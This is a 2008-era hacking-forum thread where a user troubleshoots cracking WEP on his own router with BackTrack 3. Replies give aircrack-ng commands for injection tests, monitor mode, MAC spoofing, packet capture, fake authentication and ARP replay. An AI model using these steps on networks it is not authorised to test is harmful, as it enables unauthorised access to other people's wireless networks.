Page 1 of 2 12 LastLast
Results 1 to 10 of 15

Thread: Cant break into my own wep signal, possibly hardware?

Hybrid View

  1. #1
    Junior Member
    Join Date
    Oct 2008
    Posts
    25

    Default Cant break into my own wep signal, possibly hardware?

    Hey guys, so, I tried backtrack v3 right when it came out, and the thing that got my attention the most was cracking into WEP Networks. So I tried it on my own network, and it didnt work, I figured, faulty software or faulty something. Then i hear my friend likes it to, so he brings over his mac, and he can crack right into my WEP!

    When I try it, everything seems to work perfectly except when I type
    aireplay-ng -3 b [my routers mac] -h 00:11:22:33:44:55 wlan0

    I get NO ARP requests, not a single one. even if there is activity on the network.

    My Laptop is a new acer aspire 5920, does the wireless card in it not work with injection?

    Thank you so much guys!

  2. #2
    Member
    Join Date
    Jan 2008
    Posts
    194

    Default

    first, your title says wpa, not wep.

    secondly, try the following:

    aireplay-ng --test wlan0

    That will test if injection will work with your card.

  3. #3
    Junior Member
    Join Date
    Oct 2008
    Posts
    25

    Default

    stupid me, wasnt thinking, just working.

    Ill try that right now

    I installed it on my local computer (so I dont need to boot into the cd for now), and ran that line.
    root@justin-laptop:~# aireplay-ng --test wlan0
    ioctl(SIOCSIWMODE) failed: Device or resource busy

    ARP linktype is set to 1 (Ethernet) - expected ARPHRD_IEEE80211
    or ARPHRD_IEEE80211_PRISM instead. Make sure RFMON is enabled:
    run 'ifconfig wlan0 up; iwconfig wlan0 mode Monitor channel <#>'
    Sysfs injection support was not found either.
    Can I purchase a wireless card that is supported? Is there a list of ones that are supported?

  4. #4
    Member
    Join Date
    Jan 2008
    Posts
    194

    Default

    Error kind of tells you everything.

    Make sure wlan0 is even a valid wireless interface:

    iwconfig

    Make sure it's in monitor mode:

    airmon-ng start wlan0

    as far as purchasing a card, sure. I have the Hawking HWUG1 and it works quite well. I honestly don't know what kind of card the ACER has in it nor the time to help you troubleshoot it past this point. Good luck.

  5. #5
    Member
    Join Date
    Apr 2007
    Posts
    155

    Default

    wlan0 (intel) is not able to do injection PERIOD!

    atheros (ath0) cards do.
    This is a hackers forum :P
    root ~# aircrack-ng pwnd-01.cap
    Lenovo Thinkpad R500, OS: Ubuntu 8.10, BackTrack3, Windows XP (VirtualBox), Windows Vista, Windows 7 beta

  6. #6
    Member
    Join Date
    Jan 2008
    Posts
    194

    Default

    interesting...My Intel Pro card injects just find.

    modprobe -r iwl3945
    modprobe ipwraw

    My ralink hawking works pretty well too

  7. #7
    Junior Member
    Join Date
    Oct 2008
    Posts
    25

    Default

    Quote Originally Posted by theberries View Post
    Error kind of tells you everything.

    Make sure wlan0 is even a valid wireless interface:

    iwconfig

    Make sure it's in monitor mode:

    airmon-ng start wlan0

    as far as purchasing a card, sure. I have the Hawking HWUG1 and it works quite well. I honestly don't know what kind of card the ACER has in it nor the time to help you troubleshoot it past this point. Good luck.
    Just purchased it got it on sale, anything special I need to do for this card?

    I put rausb0 into monitor mode after I changed the mac, and it wont see any wireless networks... what am I missing?

    (I ran airodump-ng rausb0, with no results, but when I run airodump-ng wlan0 I see 4 networks)

    EDIT: Got it! running aireplay-ng to capture packets, 5000 packets read, and 1 arp request, aircrack-ng fails, ill wait for more arp request

    Wow, I have 26 IVs, says that airecrack failed, next try with 5000 IVs... I need to wait for 5000? Thats gonna take all night

  8. #8
    Member
    Join Date
    Jan 2008
    Posts
    194

    Default

    Quote Originally Posted by jhyland87 View Post
    I put rausb0 into monitor mode after I changed the mac, and it wont see any wireless networks... what am I missing?

    (I ran airodump-ng rausb0, with no results, but when I run airodump-ng wlan0 I see 4 networks)
    I'm sure there's an easier way (via a script) but this is what I do with my hwug1:

    ifconfig rausb0 down
    modprobe -r rt73
    modprobe rt73
    ifconfig rausb0 up
    airmon-ng start rausb0
    airodump-ng rausb0

    jeesh...I should really script that

    Quote Originally Posted by jhyland87 View Post
    I put rausb0 into monitor mode after I changed the mac, and it wont see any wireless networks... what am I missing?

    (I ran airodump-ng rausb0, with no results, but when I run airodump-ng wlan0 I see 4 networks)

    EDIT: Got it! running aireplay-ng to capture packets, 5000 packets read, and 1 arp request, aircrack-ng fails, ill wait for more arp request

    Wow, I have 26 IVs, says that airecrack failed, next try with 5000 IVs... I need to wait for 5000? Thats gonna take all night
    With that card, you have to do the following for injection:

    iwconfig rausb0 rate 1M

    Also, being closer (or having a better antenna) to the AP will greatly increase your success. Sounds like you're testing your AP so that should be a non issue.

    Quote Originally Posted by jhyland87 View Post
    EDIT: Got it! running aireplay-ng to capture packets, 5000 packets read, and 1 arp request, aircrack-ng fails, ill wait for more arp request

    Wow, I have 26 IVs, says that airecrack failed, next try with 5000 IVs... I need to wait for 5000? Thats gonna take all night
    Just out of curiosity, did my steps help you or did you just figure it out?

  9. #9
    Junior Member
    Join Date
    Oct 2008
    Posts
    25

    Default

    Quote Originally Posted by theberries View Post
    I'm sure there's an easier way (via a script) but this is what I do with my hwug1:

    ifconfig rausb0 down
    modprobe -r rt73
    modprobe rt73
    ifconfig rausb0 up
    airmon-ng start rausb0
    airodump-ng rausb0

    jeesh...I should really script that
    I got 1 arp packet before, canceled it, then ran your commands, and continued, now its slower with 0 arp requests at 10000 packets read, lol

    Quote Originally Posted by theberries View Post
    Just out of curiosity, did my steps help you or did you just figure it out?
    Havent gotten it working just yet
    Quote Originally Posted by theberries View Post
    With that card, you have to do the following for injection:

    iwconfig rausb0 rate 1M

    Also, being closer (or having a better antenna) to the AP will greatly increase your success. Sounds like you're testing your AP so that should be a non issue.
    It is my network, and the above command didnt seem to do anything.

    Back to square one... wtf
    Here are my exact commands

    ifconfig rausb0 down
    macchanger --mac 00:11:22:33:44:55 rausb0
    airmon-ng start rausb0
    airodump-ng rausb0

    Wont show any networks, but when I dont change my mac or run any of the above commands other than airodump-ng rausb0, it will find 5

  10. #10
    Member
    Join Date
    Jan 2008
    Posts
    194

    Default

    Quote Originally Posted by jhyland87 View Post
    Back to square one... wtf
    Here are my exact commands

    ifconfig rausb0 down
    macchanger --mac 00:11:22:33:44:55 rausb0
    airmon-ng start rausb0
    airodump-ng rausb0

    Wont show any networks, but when I dont change my mac or run any of the above commands other than airodump-ng rausb0, it will find 5
    Not sure about why the macchanger would affect sniffing or injecting but just try it like this for now:

    ifconfig rausb0 down
    modprobe -r rt73
    modprobe rt73
    ifconfig rausb0 up
    iwconfig rausb0 rate 1M
    iwconfig rausb0 (just to confirm the rate was set)
    airmon-ng start rausb0
    airodump-ng rausb0
    */find your ap bssid and channel /*
    ctrl+c (ok, so you know this, just in case
    airodump-ng -c X -w wepcrack --bssid yourapbssid rausb0
    aireplay -1 0 -a apbssid rausb0
    aireplay -3 -b apbssid rausb0

    I might have those a and b flags mixed. Make sure mac filtering isn't set on your router/ap.

    Actually, just noticed this is under BT3 beta. Are you running beta or final? I haven't tested any of the above in Beta. I don't even know if RT73 is in beta.

Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •